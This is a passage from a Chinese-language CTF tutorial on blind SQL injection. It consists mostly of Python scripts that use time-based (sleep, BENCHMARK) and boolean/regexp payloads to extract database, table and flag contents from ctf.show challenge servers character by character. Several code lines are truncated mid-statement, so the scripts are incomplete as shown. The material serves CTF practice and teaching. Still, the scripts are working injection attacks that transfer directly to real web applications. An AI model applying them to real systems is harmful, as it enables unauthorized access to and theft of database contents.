八、延时注入
8.2 脚本
import requests
from time import *
url = "http://7e84a93e-e72e-4fa2-947c-1464bdaf9211.challenge.ctf.show:8080/a
flag = ''
i=0
while True:
i=i+1
header = 32 //定义ascii可见字符开始值
tail = 127 // 定义最后的ascii值
while header < tail:
mid = (header + tail) >> 1 //求出中间值
payload = "right((select flag from ctfshow_web.flag),20)"// 构造的sql语
//payload = "select database()" //cvfshow_web
//payload = "select group_concat(table_name) from information_schema.
//payload = "select group_concat(column_name) from information_schema
//print(payload)
data = {
//利用substr函数截取查询结果后的字符转换成ascii码,如果大于中间值,睡0.
'id': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.02),1)
}
try:
s = requests.post(url, data=data, timeout=0.4)//根据正确执行的次数,
//print(s.text)
tail = mid //没有报错执行这句,说明payload语句没有正确执行,没有延时,根
except Exception as e:
header = mid + 1// 正确的情况,会延时
sleep(0.4)
if header != 32:
flag+=chr(header)
else:
break
print(flag)
sleep(2)
8.3 过滤sheep的盲注
MySQL有一个内置的BENCHMARK()函数,可以测试某些特定操作的执行速度。 参 数可以是需
要执行的次数和表达式。 表达式可以是任何的标量表达式,比如返回值 是标量的子查询或者函
数。 该函数可以很方便地测试某些特定操作的性能,比如通过测试可以发现,MDS()函数比
SHAl()函数要快。
对应脚本:
import requests
url = "http://2e14a567-cf3b-49a8-9297-a6c19c2357db.challenge.ctf.show:8080/a
flag = ''
i=0
while True:
i=i+1
header = 32
tail = 127
while header < tail:
mid = (header + tail) >> 1
payload = "select flagaabc from ctfshow_web.ctfshow_flagxccb"
//payload = "select database()"
//payload = "select group_concat(column_name) from information_schema
//payload = "select group_concat(table_name) from information_schema.
//print(payload)
data = {
'ip': f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmar
'debug': '0'
}
try:
s = requests.post(url, data=data, timeout=1)
//print(s.text)
tail = mid
except Exception as e:
header = mid + 1
if header != 32:
flag+=chr(header)
else:
break
print(flag)
九、regexp 正则匹配
测试:
9.1 手动
?id=1' and if(substr((select group_concat(table_name) from information_schem
// 同时爆破 数字 a 和 字母 b
9.2 脚本
import requests
import string
url = "http://xxxxx"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
for i in range(1,45):
for j in flagstr:
//payload = f"admin' and if(substr((select group_concat(table_name) f
//payload = f"admin' and if(substr((select group_concat(column_name)
payload = f"admin' and if(substr((select group_concat(f1ag) from ctf
data = {
'username': payload, 'password': '1'
}
r = requests.post(url, data=data)
if "密码错误" == r.json()['msg']:
flag += j
print(flag)
if "}" == j:
exit(0)
break